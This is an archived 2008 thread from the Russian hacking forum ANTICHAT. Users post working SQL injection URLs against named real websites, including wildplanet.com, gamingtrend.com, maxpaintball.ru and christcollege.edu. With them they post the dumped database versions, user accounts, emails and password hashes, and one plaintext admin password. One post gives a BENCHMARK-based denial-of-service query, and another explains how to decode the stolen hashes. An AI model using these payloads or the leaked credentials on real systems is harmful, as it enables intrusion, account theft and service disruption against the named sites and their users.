ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.02.2008, 19:03
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
впервые вижу
http://www.multifamilyassessment.net/index.php?p=g&id=-1+union+select+1,version()/*
вывод типа ****.php
Warning: main(4.0.24_Debi.php):  |
|
|
16.02.2008, 19:13
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Сообщение от xcedz
впервые вижу
http://www.multifamilyassessment.net/index.php?p=g&id=-1+union+select+1,version()/*
вывод типа ****.php
Warning: main(4.0.24_Debi.php): Гг php include через sql инъекцию  Я и покруче видел, у меня в эксплоите для jportal исполнение кода через mysql inj
|
|
|
|
16.02.2008, 22:15
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
www.rus-waphost.ru
Хостер ппц) 4 админа там и они все тупые
Код:
http://rus-waphost.ru/news/komm.php?ides=1'%20union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5/*
5.0.45:admin_news@localhost:admin_new
|
|
|
|
16.02.2008, 22:38
|
|
Познающий
Регистрация: 06.11.2007
Сообщений: 57
Провел на форуме:
2688963
Репутация:
272
|
|
uabest.net
Код:
http://uabest.net/mobile/download.php?jgid=-47+union+select+1,2,3,4,5,6,7,8,9/*
version() 5.0.37-log
user() uabest_best@localhost
database() uabest_uabest
maxpaintball.ru
Код:
http://www.maxpaintball.ru/show_cat2.php?grid=-2+union+select+concat(version(),0x3a,user(),0x3a,database())
version() 4.0.27-max-log
user() maxpain3_shop@v22.valuehost.ru
database() maxpain3_shop
Код:
http://www.maxpaintball.ru/show_cat2.php?grid=-2+union+select+concat(username,0x3a,email,0x3a,passwd)+from+user+where+username+like+1013
1013:Boikov@rbr.ru:697423ce62550904
hwdecor.ru
Код:
http://hwdecor.ru/show_cat2.php?grid=-5+union+select+concat(version(),0x3a,user(),0x3a,database())/*
version() 4.0.27-max-log
user() effa112_shop@v48.valuehost.ru
database() effa112_shop
christcollege.edu
Код:
http://www.christcollege.edu/progdetails.php?prid=-51+union+select+1,2,3,4/*
version() 4.1.20
user() christco_christ@localhost
database() christco_christcollege
pseb.org.pk
Код:
http://www.pseb.org.pk/page.php?prid=-39+union+select+1,2,3,4
version() 5.0.45-community-log
user() pseborg_newpseb
database() pseborg_pseb@localhost
Код:
http://www.pseb.org.pk/page.php?prid=-39+union+select+1,2,table_name,4+from+information_schema.tables
вывод данных идёт в цикле, поэтому лимитом не нужно пользоваться)
wildplanet.com
Код:
http://www.wildplanet.com/press/wp_release_single.php?prid=-56+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8
version() 5.0.24
user() outsideuser@localhost
database() NewSite
Код:
http://www.wildplanet.com/press/wp_release_single.php?prid=-56+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6,7,8+from+WPUser+limit+0,1
Код:
1:mseltzer:B%BB0%27VG%89%F6sw%97%FF%88%19%0CI
2:digibrew:UP%E5%CDlOQ%BEUP%E5%CDlOQ%BE
3:wildplanet:%EF%EF%A7%D45%5B%3B%DEb%1F2%AFM%9C%B0%BC
4:mthomas:ty%19zv%E5Z-WR%1F%CC%D6%03%F9%98
5:tboeger:.%FE%99%B5%08%15%B1y%E1%BF%9F%06%05%9Ba%C3
9:martin:%2A%FA%AB%2FWen%1F%24%F6%D2%C1%28%3ASh
так я и не понял, чем зашифрованы пассы=/
http://wildplanet.com/admin - админка
gamingtrend.com
Код:
http://www.gamingtrend.com/PressReleases/index.php?PRID=-99999+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7
version() 5.0.45-community
user() knight_tigg3rpig@localhost
database() knight_consolegold
Код:
http://www.gamingtrend.com/PressReleases/index.php?PRID=-99999+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+Users
Код:
DarkEl:32i692acrncR.
AgtFox:DELETED
Knightshade:32CcfdIVkoDRw
PJ_phildo:DELETED
|
|
|
|
16.02.2008, 23:31
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
так я и не понял, чем зашифрованы пассы=/
Скорее всего, это пресловутый md5 в виде бинарной строки...
Сначала надо сделать urldecode(), а затем,
чтобы привести в привычный вид, надо сделать bin2hex()
Последний раз редактировалось Macro; 17.02.2008 в 00:38..
|
|
|
|
17.02.2008, 00:16
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
Провел на форуме:
347573
Репутация:
185
|
|
http://www.barefeetshoes.com/cls/index.php?method=showdetails&list=advertisement&ro llid=-3386'+union+select+1,2,3,USER(),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,DATABASE()%20 from%20classifieds_advertisement%20where%20id='338 6'/*
VERSION(): 5.0.45-community-log
USER(): barefeet_office1@localhost
DATABASE(): barefeet_clss2
пример запроса для DoS:
http://www.barefeetshoes.com/cls/index.php?method=showdetails&list=advertisement&ro llid=-3386'+union+select+1,2,3,BENCHMARK(10000000,BENCHM ARK(10000000,md5(current_date))),5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,title%20from %20classifieds_advertisement%20where%20id='3386'/*
|
|
|
|
17.02.2008, 02:28
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Che-guevara/Эрнесто Че Гевара 
Код:
http://www.che-guevara.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
4.1.22-standard/forexmol_cheguv@localhost/forexmol_cheguv
www.aqualang.ru
Код:
http://www.aqualang.ru/index.php?cat_id=1'%20union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12/*
5.0.45-communitylog:mh3spea_vallwww@localhost:mh3spea_aqu alang
Код:
http://www.elblogdegloria.com/verblog.php?ID=0x3127%20union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6/*
4.1.22-standard-log:gloria_admin@localhost:gloria_gloria
Просто так)
Код:
http://www.ria-alliance.com.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.altsport.metroland.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.gynku.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.extremal.am/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://atyraunews.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
|
|
|
|
17.02.2008, 03:16
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.dotfiles.com/index.php?cat_id=-6+union+select+concat_ws(0x3a,user,password)+from+ mysql.user/*
root:259010f859aea03d
Не бейте пожалуйста,люди,если уже было...просто очень хочу спать....
|
|
|
|
17.02.2008, 03:23
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.bis7.ru/- Сумки мать их...
http://www.bis7.ru/index.php?prid=-10+union+select+1,concat_ws(0x3a,name,passwd)+from +users/*
administrator:afina
P.S: А вот где админка хз ггггг)))
|
|
|
|
17.02.2008, 03:41
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.williamsontea.com/Pressrelease/index.php?prid=-22+union+select+1,2,,4,5,6+from+customer/*
Ели еле подобрал таблицу, до полей руки не доходят...спать....хррр хррр...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
